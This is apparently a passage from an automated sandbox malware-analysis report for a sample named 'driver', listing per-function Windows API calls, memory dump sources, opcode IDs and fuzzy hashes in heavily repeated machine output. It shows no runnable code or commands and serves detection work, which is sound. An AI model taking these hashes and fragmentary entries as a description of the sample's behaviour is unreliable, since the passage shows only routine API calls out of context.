                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000455000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.0000000000458000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.000000000045A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_40_2_400000_driver.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CloseFind
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1863332320-0
                                                                                                                                                                    • Opcode ID: 29b2e843970ae769d2ec4ce3cdad3f1c56a83751b490ac972ac517e7ed08f0b3
                                                                                                                                                                    • Instruction ID: eb898675b321ace3c7ac5f2442ceaada739fc9c5c60ee3f87f741b6dfe6c2ae5
                                                                                                                                                                    • Opcode Fuzzy Hash: 29b2e843970ae769d2ec4ce3cdad3f1c56a83751b490ac972ac517e7ed08f0b3
                                                                                                                                                                    • Instruction Fuzzy Hash: 78D0977240131042FB381EBC88C0A93029C8F04335F0C033B6E182B3E2CE3C8C088059
                                                                                                                                                                    Function 00403CBC Relevance: 1.5, APIs: 1, Instructions: 15COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetFileType.KERNEL32(?,00403971,?,?,00000050,?,00000000,00000050,00448C48,?,00000050,?,0040387A,?,?,?), ref: 00403CC8
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000028.00000002.20431935441.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000028.00000002.20431899656.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000444000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.000000000044B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000455000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.0000000000458000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.000000000045A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_40_2_400000_driver.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: FileType
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3081899298-0
                                                                                                                                                                    • Opcode ID: a9e2ea5c6888a74a5ceb93a95b21f745da12d0093212acb06476bb3f9dd49d7a
                                                                                                                                                                    • Instruction ID: 96dcd9c4c74934defe820ca016cb872f967f3f64065adbf0dabab79976313d09
                                                                                                                                                                    • Opcode Fuzzy Hash: a9e2ea5c6888a74a5ceb93a95b21f745da12d0093212acb06476bb3f9dd49d7a
                                                                                                                                                                    • Instruction Fuzzy Hash: 4ED0C9322190008AEB354E2A484A55768469781327B2AC6B2E411FA2FAD739DE82F649
                                                                                                                                                                    Function 00403B38 Relevance: 1.5, APIs: 1, Instructions: 9fileCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • SetEndOfFile.KERNEL32(?,?,00403AF0,?,?), ref: 00403B3E
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000028.00000002.20431935441.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000028.00000002.20431899656.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000444000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.000000000044B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000455000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.0000000000458000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.000000000045A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_40_2_400000_driver.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: File
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 749574446-0
                                                                                                                                                                    • Opcode ID: 295861d750375a449611f31d59331f8290f09d0d5638068b3129f9412e5b4fd6
                                                                                                                                                                    • Instruction ID: 4459ad86db906234b6f8543fbd840f9e7d39e167ca56a06d89b8afa56578fac1
                                                                                                                                                                    • Opcode Fuzzy Hash: 295861d750375a449611f31d59331f8290f09d0d5638068b3129f9412e5b4fd6
                                                                                                                                                                    • Instruction Fuzzy Hash: AFB01272311100877B0129738DC3515568DBA44121308C061BC04C8022D70ACC603020
                                                                                                                                                                    Function 0043B704 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GlobalMemoryStatus.KERNEL32 ref: 0043B70F
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000028.00000002.20431935441.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000028.00000002.20431899656.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000444000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.000000000044B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000455000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.0000000000458000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.000000000045A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_40_2_400000_driver.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: GlobalMemoryStatus
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1890195054-0
                                                                                                                                                                    • Opcode ID: 299d11eaec76b9466c4cc5e28fc6bf4b8dcd1e149d3e92555f0c12d2c7d429a2
                                                                                                                                                                    • Instruction ID: f413bd284f824af415c53f5297e6ff2c78c627526e60ce4ca031673f5b51ac77
                                                                                                                                                                    • Opcode Fuzzy Hash: 299d11eaec76b9466c4cc5e28fc6bf4b8dcd1e149d3e92555f0c12d2c7d429a2
                                                                                                                                                                    • Instruction Fuzzy Hash: DAB092304046006BE210AB198842B5EB290AB84268F848608B8E8563C2EA3D5264878B
                                                                                                                                                                    Function 00441A44 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • ExitProcess.KERNEL32(00441D17,?,00440F05,00441D17,?,?,00440F1C,00000000,00000000,00441D17), ref: 00441A4B
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000028.00000002.20431935441.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000028.00000002.20431899656.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000444000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.000000000044B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000455000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.0000000000458000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.000000000045A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_40_2_400000_driver.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ExitProcess
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 621844428-0
                                                                                                                                                                    • Opcode ID: 82cbba9f795b21e837e00f58920276255396f527bb604faf2ab55e76b067c7b7
                                                                                                                                                                    • Instruction ID: 70cc31fe1519789704043cdce041419b9dd17bf4187dfd6a70dd854e047b92df
                                                                                                                                                                    • Opcode Fuzzy Hash: 82cbba9f795b21e837e00f58920276255396f527bb604faf2ab55e76b067c7b7
                                                                                                                                                                    • Instruction Fuzzy Hash: B0A0027655830C67AE10BEEED846C9A77DC5A08E56B404416FE048B702DE79FE8046E9
                                                                                                                                                                    Function 00403F58 Relevance: 1.4, Strings: 1, Instructions: 143COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000028.00000002.20431935441.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000028.00000002.20431899656.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000444000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.000000000044B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000455000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.0000000000458000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.000000000045A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_40_2_400000_driver.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID: %s
                                                                                                                                                                    • API String ID: 0-3874713491
                                                                                                                                                                    • Opcode ID: f2cb90a0a5e2d3ddc2e0c161d2da7edd8ea9ddf631dec10959c38ea75f94b5da
                                                                                                                                                                    • Instruction ID: ca0b255dd5892f103d3df91a5e6c2a13aa809f7cc5fa3f02f6ab703885413e88
                                                                                                                                                                    • Opcode Fuzzy Hash: f2cb90a0a5e2d3ddc2e0c161d2da7edd8ea9ddf631dec10959c38ea75f94b5da
                                                                                                                                                                    • Instruction Fuzzy Hash: E651A1B0D002499ADB10DBA5C8447EEBBB5AF95305F1480BBDA40B73C1D7794E86CB99
                                                                                                                                                                    Function 0043B3C8 Relevance: 1.3, Strings: 1, Instructions: 88COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000028.00000002.20431935441.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000028.00000002.20431899656.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000444000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.000000000044B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000455000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.0000000000458000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.000000000045A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_40_2_400000_driver.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID: 0kD
                                                                                                                                                                    • API String ID: 0-747768679
                                                                                                                                                                    • Opcode ID: b4674f876a120605bf270b049a337c0bc4ec0d2d3b7d3f23f2ae76f2c8408aea
                                                                                                                                                                    • Instruction ID: da21c4ed050fcdacb6c14ee2865b525d80690641e752e000ed7971c8b4c62abe
                                                                                                                                                                    • Opcode Fuzzy Hash: b4674f876a120605bf270b049a337c0bc4ec0d2d3b7d3f23f2ae76f2c8408aea
                                                                                                                                                                    • Instruction Fuzzy Hash: E5310EB56006118FC309CF14D990A11FBA2FF9A324729C3A9D9198B3E6D735EC81CB89
                                                                                                                                                                    Function 00403514 Relevance: 1.3, APIs: 1, Instructions: 47COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • CloseHandle.KERNEL32(?,00000000,00449284,00000001,00403D82,?,00000002,00448C48,00433DE9,?,00448C48,00433AED,00000000,?,00403AA8,?), ref: 0040353C
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000028.00000002.20431935441.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000028.00000002.20431899656.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000444000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.000000000044B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000455000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.0000000000458000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.000000000045A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_40_2_400000_driver.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CloseHandle
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2962429428-0
                                                                                                                                                                    • Opcode ID: e8e24076be3caef466fec9a35bf5f7aeb0d936cf63980a682188003264a85de2
                                                                                                                                                                    • Instruction ID: f4165267c49926bdf8c425745df94be49d9d080085b9b4dd57279aaf58034d05
                                                                                                                                                                    • Opcode Fuzzy Hash: e8e24076be3caef466fec9a35bf5f7aeb0d936cf63980a682188003264a85de2
                                                                                                                                                                    • Instruction Fuzzy Hash: EB019BB0201B01BEE7309E3D8C44353BBD4AB45366F148A3FD8E6A32E0D378A945CB55
                                                                                                                                                                    Function 0043ABB0 Relevance: 1.3, APIs: 1, Instructions: 30memoryCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • VirtualAlloc.KERNEL32(?,00001000,00001000,00000004,?,?,02D00000,0043B281), ref: 0043ABCA
                                                                                                                                                                      • Part of subcall function 0043ABFC: VirtualFree.KERNEL32(?,?,00004000,0043B343), ref: 0043AC03
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000028.00000002.20431935441.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000028.00000002.20431899656.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000444000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.000000000044B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000455000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.0000000000458000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.000000000045A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_40_2_400000_driver.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Virtual$AllocFree
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2087232378-0
                                                                                                                                                                    • Opcode ID: e371c889e9df4b82e4f01cc5b0699d3b6a6a0b4157c9f60cb42008905165dff7
                                                                                                                                                                    • Instruction ID: 28bcb04f0457f68c76682d1b40e84fedbf56841a2c13e0404209e956c1b1b99c
                                                                                                                                                                    • Opcode Fuzzy Hash: e371c889e9df4b82e4f01cc5b0699d3b6a6a0b4157c9f60cb42008905165dff7
                                                                                                                                                                    • Instruction Fuzzy Hash: 0FE04F72B8026123E632142E5C85B97848A4B8C7E6F1951767BC4EA388D99DEC954099
                                                                                                                                                                    Function 00437AD8 Relevance: 1.3, Strings: 1, Instructions: 28COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000028.00000002.20431935441.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000028.00000002.20431899656.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000444000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.000000000044B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000455000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.0000000000458000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.000000000045A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_40_2_400000_driver.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID: MZP
                                                                                                                                                                    • API String ID: 0-2889622443
                                                                                                                                                                    • Opcode ID: 20a16cba0d9bcc5a3f3f62a4f9a6f3d39f3a5846fa67696b481da96eed2385e1
                                                                                                                                                                    • Instruction ID: 4c775829592d47e153e90eb6f16fac50b3d624085669bbea9dd324f25c5e1708
                                                                                                                                                                    • Opcode Fuzzy Hash: 20a16cba0d9bcc5a3f3f62a4f9a6f3d39f3a5846fa67696b481da96eed2385e1
                                                                                                                                                                    • Instruction Fuzzy Hash: 41E02B50708B1142D711AB3F1C8274741958F8C349F08E43FB848CB30BDABC8C005A69
                                                                                                                                                                    Function 0043ABFC Relevance: 1.3, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • VirtualFree.KERNEL32(?,?,00004000,0043B343), ref: 0043AC03
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000028.00000002.20431935441.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000028.00000002.20431899656.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000444000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.000000000044B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000455000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.0000000000458000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.000000000045A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_40_2_400000_driver.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: FreeVirtual
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1263568516-0
                                                                                                                                                                    • Opcode ID: f23964147c4317ee1d4755d339e98c999bfc8d46951b6f40a30d912a2ca359c0
                                                                                                                                                                    • Instruction ID: 8f00b51455625eda0eed7b2ddbb7a15c579750c9eef164029d51f51d8be08c17
                                                                                                                                                                    • Opcode Fuzzy Hash: f23964147c4317ee1d4755d339e98c999bfc8d46951b6f40a30d912a2ca359c0
                                                                                                                                                                    • Instruction Fuzzy Hash: 1CB012D02E050422FD105B311C15B270058B3C0F02FE424D53200D15C0C86DC900902C
                                                                                                                                                                    Function 0043854C Relevance: .2, Instructions: 157COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000028.00000002.20431935441.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000028.00000002.20431899656.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000444000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.000000000044B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000455000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.0000000000458000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.000000000045A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_40_2_400000_driver.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 6e7524a3830432f919ba47a2e9817902062f613d2ccd8885e8054fff1706b872
                                                                                                                                                                    • Instruction ID: 04ea4296141ddd568b5e36fa65614d5e450240edb1229a3485f4574b87ca8bbe
                                                                                                                                                                    • Opcode Fuzzy Hash: 6e7524a3830432f919ba47a2e9817902062f613d2ccd8885e8054fff1706b872
                                                                                                                                                                    • Instruction Fuzzy Hash: 0351B7727141614BDB148E28C8D1625BBD2EFC9314F19C6BDE899CF38AD938DC06CB90
                                                                                                                                                                    Function 0042B1CC Relevance: .2, Instructions: 156COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000028.00000002.20431935441.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000028.00000002.20431899656.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000444000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.000000000044B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000455000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.0000000000458000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.000000000045A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_40_2_400000_driver.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: d12e9b3e522e1a889a2f1461187ddbab3bb9002c90ff242499a04958ba45c115
                                                                                                                                                                    • Instruction ID: 1c31bb3ff659de7d6612539b513fed28ec1484e1f46e7115fd56b983a70d74ba
                                                                                                                                                                    • Opcode Fuzzy Hash: d12e9b3e522e1a889a2f1461187ddbab3bb9002c90ff242499a04958ba45c115
                                                                                                                                                                    • Instruction Fuzzy Hash: F9518171B00224CBCF14DE68D9C47AA77A1EF84314F6842BADC199B38AD7399D41CBD9
                                                                                                                                                                    Function 0042B3B4 Relevance: .1, Instructions: 86COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000028.00000002.20431935441.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000028.00000002.20431899656.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000444000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.000000000044B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000455000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.0000000000458000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.000000000045A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_40_2_400000_driver.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorLast$FileWrite
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 603252729-0
                                                                                                                                                                    • Opcode ID: bbda58a769465bbc3868d87607224a5e6bbcfddd0c8d0ea6b1359b50b5c070cf
                                                                                                                                                                    • Instruction ID: 61f2dc88081507546c1089a6d384438cf633fdda2f14b4dff192c58481b4a6c2
                                                                                                                                                                    • Opcode Fuzzy Hash: bbda58a769465bbc3868d87607224a5e6bbcfddd0c8d0ea6b1359b50b5c070cf
                                                                                                                                                                    • Instruction Fuzzy Hash: 86318670B042609BDB14EF1AE8C575A7BA9EF44314F5841BBE8058F29BDB74CD81CB98
                                                                                                                                                                    Function 00430D46 Relevance: .1, Instructions: 86COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000028.00000002.20431935441.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000028.00000002.20431899656.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000444000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.000000000044B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000455000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.0000000000458000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.000000000045A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_40_2_400000_driver.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: LoadString
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2948472770-0
                                                                                                                                                                    • Opcode ID: e24561253897a7daae2fdcb678fcf6272fd63b4d40e19a95741f9362efd8df00
                                                                                                                                                                    • Instruction ID: 53bd1d11b3f938579b08c74910fd4fcbaad7ad8f952fd880c10c36dc04ea63f3
                                                                                                                                                                    • Opcode Fuzzy Hash: e24561253897a7daae2fdcb678fcf6272fd63b4d40e19a95741f9362efd8df00
                                                                                                                                                                    • Instruction Fuzzy Hash: 44317031A046049BEF24A765E8927EB77949B08305F405D7FE84957287DF3CA8C48B7D
                                                                                                                                                                    Function 00403838 Relevance: .1, Instructions: 83COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000028.00000002.20431935441.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000028.00000002.20431899656.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000444000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.000000000044B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432041389.0000000000455000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000028.00000002.20432331845.0000000000458000.00000002.00000001.01000000.00000007.sdmpDownload File
